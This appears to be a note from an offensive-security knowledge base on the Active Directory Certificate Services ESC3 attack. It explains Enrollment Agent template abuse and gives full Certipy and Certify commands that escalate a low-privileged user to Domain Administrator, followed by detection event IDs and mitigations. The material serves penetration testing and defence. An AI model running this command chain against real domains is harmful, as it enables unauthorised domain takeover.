attack-29-esc3-certificate-request-agent.md (3775B)
1 --- 2 title: "Attack #29 โ ESC3 Certificate Request Agent" 3 description: "ESC3 exploits the Certificate Request Agent (Enrollment Agent) EKU. A template with this EKU allows the enrolled user to request certificates on behalf ofโฆ" 4 category: active-directory 5 subcategory: "ADCS & Certificates" 6 tags: ["active-directory", "adcs", "privilege-escalation"] 7 tools: ["Certipy", "Certify", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Four/๐ข Attack #29 โ ESC3 Certificate Request Agent.md" 11 --- 12 # ๐ข Attack #29 โ ESC3: Certificate Request Agent 13 14 *** 15 16 ## ๐ How It Works 17 18 ESC3 exploits the **Certificate Request Agent** (Enrollment Agent) EKU. A template with this EKU allows the enrolled user to **request certificates on behalf of other users**. If a low-privileged user can enroll for an Enrollment Agent certificate, they can then use it to request a Client Authentication certificate for any user in the domain โ including Domain Admins. 19 20 ### Two-Step Attack 21 22 ``` 23 1. Enroll for a certificate with "Certificate Request Agent" EKU (Template A) 24 2. Use that certificate to request a Client Auth cert on behalf of Administrator (Template B) 25 3. Authenticate as Administrator using the resulting certificate 26 ``` 27 28 *** 29 30 ## โ๏ธ Prerequisites 31 32 | Requirement | Detail | 33 |---|---| 34 | **Template with Certificate Request Agent EKU** | Low-priv users can enroll | 35 | **Second template allowing enrollment-on-behalf-of** | Must allow agent-based enrollment | 36 | **Manager approval not required** | On both templates | 37 38 *** 39 40 ## ๐ป Full Commands 41 42 ```bash 43 # โโ Enumerate โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 44 certipy find -u low_user@corp.local -p 'Password1' -dc-ip 10.10.10.10 -vulnerable -stdout 45 # Look for: ESC3 โ Certificate Request Agent template 46 47 # โโ Step 1: Get enrollment agent certificate โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 48 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \ 49 -template EnrollmentAgentTemplate -dc-ip 10.10.10.10 50 51 # โโ Step 2: Request cert on behalf of Administrator โโโโโโโโโโโโโโโโโโโโโโโโโโ 52 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \ 53 -template User -on-behalf-of 'corp\Administrator' \ 54 -pfx low_user.pfx -dc-ip 10.10.10.10 55 56 # โโ Step 3: Authenticate โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 57 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 58 ``` 59 60 ```powershell 61 # โโ Certify โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 62 .\Certify.exe request /ca:CORP-CA /template:EnrollmentAgentTemplate 63 # Convert to PFX, then use for on-behalf-of requests 64 ``` 65 66 *** 67 68 ## ๐ก๏ธ Detection โ Event IDs 69 70 | Event ID | Source | What to Look For | 71 |---|---|---| 72 | **4886** | Security Log (CA) | Certificate enrollment โ watch for enrollment agent requests | 73 | **4887** | Security Log (CA) | On-behalf-of requests from non-admin enrollment agents | 74 75 *** 76 77 ## ๐ Attack Chain Context 78 79 ``` 80 [ESC3] โโโ Enrollment Agent โ request certs as any user 81 โ 82 โโโโ ๐ Similar to ESC2 but with explicit Enrollment Agent EKU 83 โโโโ ๐ Defeated by: restrict enrollment agent templates, require approval 84 ``` 85 86 *** 87 88 > โ **Attack #29 โ ESC3 complete.**